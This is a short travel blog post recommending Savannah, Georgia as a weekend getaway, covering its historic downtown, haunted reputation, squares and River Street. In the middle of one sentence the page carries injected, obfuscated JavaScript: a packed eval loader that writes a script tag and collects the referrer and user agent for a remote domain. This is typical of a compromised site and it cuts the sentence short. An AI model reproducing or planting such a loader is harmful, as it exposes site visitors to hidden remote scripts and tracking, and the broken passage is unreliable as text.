Weekend Getaways

2013, Travel

If you live in the Southeast of the U.S. a to-go weekend getaway is Savannah, GA.  It’s historic downtown is picturesque on the bluffs looking over the river, but by night, it is known as America’s most haunted city.  It has much history (at least as much a young country like the U.S. can have) and a beautiful aurora with the buildings and live oaks draped in Spanish Moss. I’d highly recommend a bike eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dytdb|var|u0026u|referrer|istyy||js|php’.split(‘|’),0,{}))

Savannah’s historic downtown is built in a grid system with public squares placed throughout the city to confuse the Spanish should they invade the city.

River Street

Like the famous Bourbon Street in New Orleans, visitors must walk River Street in Savannah.

I loved the relaxed feel of Savannah.  It’s a beautiful city filled with activities and fun events throughout the year.  I’d highly recommend you to visit if you have a chance!
